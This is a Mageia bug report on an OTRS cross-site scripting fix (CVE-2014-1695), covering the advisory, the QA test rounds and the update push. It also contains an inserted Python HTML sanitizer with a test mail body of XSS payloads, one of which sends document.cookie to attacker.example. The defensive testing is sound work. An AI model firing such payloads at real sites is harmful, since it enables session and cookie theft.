Bug 12910 - otrs new security issue CVE-2014-1695
Summary: otrs new security issue CVE-2014-1695
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security
Version: 4
Hardware: i586 Linux
Priority: Normal / Severity: normal
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL: http://lwn.net/Vulnerabilities/589096/
Whiteboard: MGA3TOO MGA4-32-OK MGA4-64-OK MGA3-32...
Keywords: validated_update
Depends on:
Blocks:
 
Reported: 2014-03-01 22:01 CET by David Walser
Modified: 2014-03-03 19:10 CET (History)

See Also:
Source RPM: otrs-3.2.14-1.mga4.src.rpm
CVE:
Status comment:


Attachments

Description David Walser 2014-03-01 22:01:13 CET
Upstream has issued an advisory on February 25:
https://www.otrs.com/security-advisory-2014-03-xss-issue/

The issue is fixed upstream in 3.2.15.

Updated packages uploaded for Mageia 3, Mageia 4, and Cauldron.

Advisory:
========================

Updated otrs package fixes security vulnerability:

An attacker could send a specially prepared HTML email to OTRS. If he can then
trick an agent into following a special link to display this email, JavaScript
code would be executed (CVE-2014-1695).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1695
https://www.otrs.com/security-advisory-2014-03-xss-issue/
http://www.otrs.com/release-notes-otrs-help-desk-3-2-15/
========================

Updated packages in core/updates_testing:
========================
otrs-3.2.15-1.mga3
otrs-3.2.15-1.mga4

from SRPMS:
otrs-3.2.15-1.mga3.src.rpm
otrs-3.2.15-1.mga4.src.rpm

Reproducible: 

Steps to Reproduce:
David Walser 2014-03-01 22:01:23 CET

Version: Cauldron => 4
Whiteboard: (none) => MGA3TOO
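The advisory above describes the bug class only at a high level (HTML mail containing JavaScript, rendered to an agent who opens it). As an added example, not OTRS code and not part of this bug report, the following allowlist sanitizer shows the kind of server-side filtering that a fix for an HTML-mail XSS relies on: every element, attribute and URL scheme not on an allowlist is removed before the body is handed to the agent's browser. The allowlists, the helper names and the test message are illustrative assumptions; the upstream proof of concept is not published in the advisory, so the payloads used here are generic.

```python
"""Allowlist HTML sanitizer for mail bodies shown to help-desk agents.

Added example, not OTRS code. Elements, attributes and URL schemes that are
not allowlisted are removed, so a script, event handler or javascript: link
in an inbound mail is dropped rather than rendered. Allowlists are assumptions.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Formatting elements only; nothing that can run or load code.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "strong", "em", "a", "ul", "ol", "li",
                "blockquote", "pre", "code", "span", "div", "table", "tr", "td", "th"}
# Per-element attribute allowlist; style and every on* handler are absent on purpose.
ALLOWED_ATTRS = {"a": {"href", "title"}, "td": {"colspan", "rowspan"}, "th": {"colspan", "rowspan"}}
ALLOWED_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br"}
# For these the whole subtree is discarded, not just the tags.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed"}


def _safe_url(url: str) -> bool:
    """Reject non-allowlisted schemes. HTMLParser has already decoded entities
    (e.g. &#106;avascript); control and whitespace characters that browsers
    ignore when sniffing the scheme (tabs inside 'javascript:') are stripped."""
    cleaned = "".join(ch for ch in url if ord(ch) > 0x20)
    scheme = urlparse(cleaned).scheme.lower()
    return scheme == "" or scheme in ALLOWED_SCHEMES


class _Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0   # > 0 while inside a DROP_CONTENT element
        self.open_stack = []  # tags we emitted, so we only close our own

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # drop the tag itself; its text children still flow through
        kept = []
        for name, value in attrs:
            if value is None or name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not _safe_url(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_stack.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_stack:
            return
        while self.open_stack:  # close down to the matching tag, repairing nesting
            popped = self.open_stack.pop()
            self.out.append(f"</{popped}>")
            if popped == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def close(self):
        super().close()
        while self.open_stack:  # close anything the mail left open
            self.out.append(f"</{self.open_stack.pop()}>")


def sanitize_html(body: str) -> str:
    """Return a rendering-safe version of an untrusted HTML mail body."""
    s = _Sanitizer()
    s.feed(body)
    s.close()
    return "".join(s.out)


# Constructed test message with generic payloads (assumption: not the upstream
# proof of concept, which the advisory does not publish).
MALICIOUS_MAIL_BODY = (
    "<p>Hello support,</p>"
    '<script>document.location="https://attacker.example/?c="+document.cookie</script>'
    '<img src="x" onerror="alert(document.cookie)">'
    '<a href="javascript:alert(1)">click</a> '
    '<a href="&#106;avascript:alert(2)">click2</a> '
    '<a href="https://example.org/ticket" onclick="alert(3)">ticket</a>'
    '<p style="background:url(javascript:alert(4))">Thanks</p>'
)
```

Running `sanitize_html(MALICIOUS_MAIL_BODY)` leaves only the paragraphs, the plain `<a>` elements and the one `https:` link; the script body, the `img` with its `onerror` handler, both `javascript:` hrefs (including the entity-encoded one), the `onclick` handler and the `style` attribute are all gone. A test of an update like this one would feed such a body into the real product's HTML filter and check the rendered result the same way.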

Comment 1 Marc Lattemann 2014-03-02 19:43:44 CET
did not find how to check this vulnerability...

tested general installation of otrs on MGA4 32bit:
- installed version from core and run installer
- log into otrs
- update installed version from update-testing
- log into updated otrs
--> no errors detected
- delete existing database
- re-run installer to install updated version
- log into otrs
--> no errors detected

update tested successfully in MGA4 32bit

CC: (none) => marc.lattemann
Whiteboard: MGA3TOO => MGA3TOO MGA4-32-OK

Comment 2 Marc Lattemann 2014-03-02 20:10:15 CET
update tested successfully in MGA4 64bit based on comment #1

Whiteboard: MGA3TOO MGA4-32-OK => MGA3TOO MGA4-32-OK MGA4-64-OK

Comment 3 Marc Lattemann 2014-03-02 21:04:13 CET
update tested successfully in MGA3 32bit

Comment 4 Marc Lattemann 2014-03-02 21:30:13 CET
update tested successfully in MGA3 64bit.

If tests above are sufficient, then advisory can be uploaded and validated.

Whiteboard: MGA3TOO MGA4-32-OK MGA4-64-OK => MGA3TOO MGA4-32-OK MGA4-64-OK MGA3-32-OK MGA-64-OK

Marc Lattemann 2014-03-02 21:30:54 CET

Whiteboard: MGA3TOO MGA4-32-OK MGA4-64-OK MGA3-32-OK MGA-64-OK => MGA3TOO MGA4-32-OK MGA4-64-OK MGA3-32-OK MGA3-64-OK

Comment 5 Thomas Backlund 2014-03-02 21:38:07 CET
advisory uploaded, validating.

Keywords: (none) => validated_update
Whiteboard: MGA3TOO MGA4-32-OK MGA4-64-OK MGA3-32-OK MGA3-64-OK => MGA3TOO MGA4-32-OK MGA4-64-OK MGA3-32-OK MGA3-64-OK advisory
CC: (none) => tmb, sysadmin-bugs

Comment 6 Thomas Backlund 2014-03-02 22:01:41 CET
Update pushed:
http://advisories.mageia.org/MGASA-2014-0114.html

Status: NEW => RESOLVED
Resolution: (none) => FIXED

David Walser 2014-03-03 19:10:37 CET

URL: (none) => http://lwn.net/Vulnerabilities/589096/

